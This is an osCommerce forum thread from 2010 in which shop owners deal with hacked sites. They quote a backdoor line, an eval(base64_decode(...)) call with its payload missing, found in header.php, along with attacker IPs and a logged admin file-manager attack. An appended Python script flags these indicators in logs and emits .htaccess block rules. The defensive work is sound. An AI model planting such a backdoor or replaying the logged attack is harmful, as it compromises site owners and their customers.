Lary_an Posted October 9, 2010

Hi, I have a big problem with my site - GOOGLE FLAGGED IT FOR A VIRUS. It is hosted on Linux and the host does not assist in virus removal. The host suggested I download the whole site, check it for viruses and upload it back up. The problem is, when I do that using the latest version of Norton I get a clean run - no viruses. I checked every single file as much as I could to see if there is any updated code and didn't find any.

The only thing I see which I don't think I had before is a new folder named www with a full copy of my site, which looks like it is being updated as soon as I update my regular site directory. I was wondering if this can be the cause of my problems. PLEASE HELP!!!! Any advice would be greatly appreciated!!!!!

P.S. Just got a message from my host that the www folder is a virtual folder and I shouldn't worry about it!
geoffreywalton Posted October 9, 2010

Norton does not check for malicious code in the source of web pages. If you install Site Monitor on your site, that normally shows "most" of the files that need cleansing. You could also read a few threads on hacked sites which discuss infected files in image and other directories.

HTH, G
germ Posted October 9, 2010

> Hi, I have a big problem with my site - GOOGLE FLAGGED IT FOR A VIRUS. [...] P.S. Just got a message from my host that the www folder is a virtual folder and I shouldn't worry about it!

Visit the link below: How to Secure Your Site

Pay close attention to "SECURING THE ADMIN" - yours is vulnerable.

There is a suspicious file in your root folder: cookie_setup.php

I've seen it before. It's normally a hack file.
Lary_an Posted October 11, 2010 (Author)

> Visit the link below: How to Secure Your Site
> Pay close attention to "SECURING THE ADMIN" - yours is vulnerable.
> There is a suspicious file in your root folder: cookie_setup.php
> I've seen it before. It's normally a hack file.

Jim, THANK YOU!!!!! THANK YOU!!!! THANK YOU!!!!! This was it! Everything works now and we are working on making the site more secure... We were not aware before of any add-ons that we could use (not good when you are a beginner and don't ask the right questions). Thanks again!
accessories Posted November 10, 2010

I need urgent help... Please... My website was recently hacked. I restored the website, godaddy.com removed some infected script file, Google lifted the ban, but recently when I go to my website, which is divineaccessories.com, it tries to download something and my Norton picks it up as an intrusion attack, high risk, by 91.204.48.52, port 80, attacker 4141.in/cvyukfmcuhnhvb.jar or 2727.in/xxxxxxxx. Please, please advise, as I am not getting any traffic to my website, which is a decent website but not getting any traffic, probably due to the virus.
Cool Daddy Posted November 13, 2010

Unfortunately I have the same issue. With Site Monitor I found they left the following at the end of the file catalog/includes/header.php:

<?php eval(base64_decode("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"));?>

When I installed my clean backup, it was back within 10 minutes; it seems like they used some kind of bot. When I took my site offline for a day and then tried again, it did not come back. Of course I did various things to increase my site's security, but I'm not sure if I solved the issue and that they won't be back. So if anyone can translate the above for me or has some specific directions, I would appreciate it.
Guest Posted November 14, 2010

The hacker has installed a back door to your insecure website. Look for and remove anomalous files and malicious code within the entire website. Hackers commonly use 'like' files such as g00gle12331546.php or goog1e312231.php that make you think that the file is legitimate.

Chris
Cool Daddy Posted November 15, 2010

> The hacker has installed a back door to your insecure website. [...] Hackers commonly use 'like' files such as g00gle12331546.php or goog1e312231.php that make you think that the file is legitimate.

Yep, found some of those, and some fake PHP files too. Further, I discovered some visits from a Russian IP, 91/213/174/123.
Wayne Weedon Posted November 15, 2010

> Yep, found some of those, and some fake PHP files too. Further, I discovered some visits from a Russian IP, 91/213/174/123.

That single IP must be responsible for a lot of altered osC installations. I've lost count of the number of times it's been seen in my Apache logs now. Sadly Russian ISPs probably couldn't care less, so I block the whole country myself.
timint Posted November 16, 2010

Have you tried finding threats using my threat scanner? Some dig it, some don't. http://addons.oscommerce.com/info/7211
Wayne Weedon Posted November 17, 2010

He's tried today; I wondered how much longer it would be before he'd be back. Awwww, he got a 403, poor soul!

91.213.174.123 - - [17/Nov/2010:11:58:13 +0000] "POST /catalog//admin/file_manager.php/login.php?action=save HTTP/1.1" 403 1245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
mdtaylorlrim Posted November 17, 2010

> That single IP must be responsible for a lot of altered osC installations. [...] Sadly Russian ISPs probably couldn't care less, so I block the whole country myself.

My .htaccess file that is blocking countries is about 9 MB long...
Wayne Weedon Posted November 17, 2010

> My .htaccess file that is blocking countries is about 9 MB long...

I don't go to quite that extent. Mine's about 250 KB with the main problematic countries in it. Another one to block as a user agent is the ZmEu script. This seems to run on either compromised servers or servers specifically set up to scan other sites for vulnerabilities. http://www.theta.tk/wiki/ZmEu
Cool Daddy Posted November 18, 2010

> I don't go to quite that extent. Mine's about 250 KB with the main problematic countries in it. Another one to block as a user agent is the ZmEu script. [...]

Exactly how do you block the ZmEu script, Wayne? Do I just need to add

RewriteCond %{HTTP_USER_AGENT} ^ZmEu [OR]

to my list of blocked bots?

I was thinking, wouldn't it be a good idea to start a thread with an OSCOMMERCE HATE LIST? We could collect the IPs of all known osCommerce hackers and use them in the IP trap or in .htaccess. Similar for the bad bots, although the IP trap has already got a nice collection.
Wayne Weedon Posted November 18, 2010

> Exactly how do you block the ZmEu script, Wayne? [...] We could collect the IPs of all known osCommerce hackers and use them in the IP trap or in .htaccess. [...]

I think I have

RewriteCond %{HTTP_USER_AGENT} ^(.*)ZmEu(.*) [OR]

Of course they can probably use any user agent they like, but most are basically lazy and don't bother. I think I have also seen the same thing visit as "Morpheous strikes again".

Well, there are certainly many IPs that seem to visit many sites again and again. It would not surprise me if they visit this forum quite a lot too! I wonder if any are registered users!

Wayne....
Wayne Weedon Posted November 19, 2010

Here's a few culprits anyway if you want to collate!

78.170.113.226 TR
81.214.228.61 TR
91.211.16.126 UA
91.213.174.123 RU
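Pulling together Wayne's log line, the ZmEu user agent and the IP list above, here is an added Python triage script. It is not code from the thread or from osCommerce, and it makes two assumptions: that the shop owner's own address is 203.0.113.9 (made up for the example, so requests to /admin/ from it are treated as normal), and that the .htaccess it emits should use the Apache 2.2-era Order/Deny syntax alongside the RewriteCond form the thread already uses. The sample log lines are constructed, except the first, which is the one Wayne posted. The script parses combined-format lines, flags any request to /admin/ from an address other than the owner's (and a POST to admin/file_manager.php in particular), any ZmEu agent, and the four listed IPs, records whether the server already answered 403, and renders the matching Deny from / RewriteCond lines.

```python
"""Triage Apache combined-format log lines for the indicators raised in the thread:
admin requests from unknown addresses, the ZmEu scanner's user agent, and
repeat-offender IPs. Added example; not code from the thread."""
import re
from typing import Dict, List, Optional

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# The four addresses Wayne listed in the thread (November 2010).
KNOWN_BAD_IPS = {"78.170.113.226", "81.214.228.61", "91.211.16.126", "91.213.174.123"}
# Assumed for the example: the shop owner's own address, allowed to use /admin/.
ALLOWED_ADMIN_IPS = {"203.0.113.9"}
BAD_AGENT_RE = re.compile(r"ZmEu", re.IGNORECASE)
ADMIN_RE = re.compile(r"/admin/", re.IGNORECASE)
FILE_MANAGER_RE = re.compile(r"/admin/file_manager\.php", re.IGNORECASE)

# Constructed sample log. The first line is the one Wayne posted; the rest are made up.
SAMPLE_LOG = [
    '91.213.174.123 - - [17/Nov/2010:11:58:13 +0000] "POST /catalog//admin/file_manager.php/login.php?action=save HTTP/1.1" 403 1245 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"',
    '78.170.113.226 - - [18/Nov/2010:02:11:04 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 209 "-" "ZmEu"',
    '203.0.113.9 - - [18/Nov/2010:09:30:00 +0000] "GET /catalog/admin/index.php HTTP/1.1" 200 8190 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [18/Nov/2010:09:31:12 +0000] "GET /catalog/product_info.php?products_id=31 HTTP/1.1" 200 14022 "-" "Mozilla/5.0"',
    "this line is not in combined log format",
]


def parse_line(line: str) -> Optional[Dict]:
    """Split one combined-format line into fields; None for anything that doesn't parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # Collapse repeated slashes so /catalog//admin/ is matched like /catalog/admin/.
    entry["path"] = re.sub(r"/{2,}", "/", entry["path"])
    return entry


def classify(entry: Dict) -> List[str]:
    """Return the reasons a request deserves attention (empty list when benign)."""
    reasons = []
    if entry["ip"] in KNOWN_BAD_IPS:
        reasons.append("known-bad-ip")
    if BAD_AGENT_RE.search(entry["ua"]):
        reasons.append("zmeu-user-agent")
    if ADMIN_RE.search(entry["path"]) and entry["ip"] not in ALLOWED_ADMIN_IPS:
        reasons.append("admin-from-unknown-ip")
        if entry["method"].upper() == "POST" and FILE_MANAGER_RE.search(entry["path"]):
            reasons.append("admin-file-manager-post")
    return reasons


def analyze(lines: List[str]) -> List[Dict]:
    """Run every parseable line through classify() and keep the ones that alert."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            alerts.append({
                "ip": entry["ip"],
                "path": entry["path"],
                "reasons": reasons,
                "blocked": entry["status"] == 403,  # 403 = existing rules already caught it
            })
    return alerts


def render_htaccess(alerts: List[Dict]) -> str:
    """Emit Apache 2.2-style .htaccess lines for the alerting IPs plus a ZmEu agent rule."""
    lines = ["Order Allow,Deny", "Allow from all"]
    lines += ["Deny from %s" % ip for ip in sorted({a["ip"] for a in alerts})]
    lines += ["RewriteEngine On",
              "RewriteCond %{HTTP_USER_AGENT} ZmEu [NC]",
              "RewriteRule .* - [F,L]"]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for hit in hits:
        print(hit["ip"], ",".join(hit["reasons"]), "blocked" if hit["blocked"] else "served")
    print(render_htaccess(hits))
```

A 403 in the status column means the existing rules already turned the request away, as in Wayne's log line; a request to /admin/ from an unknown address that was answered 200 is the one to chase, because that is the case where the file manager may actually have written something.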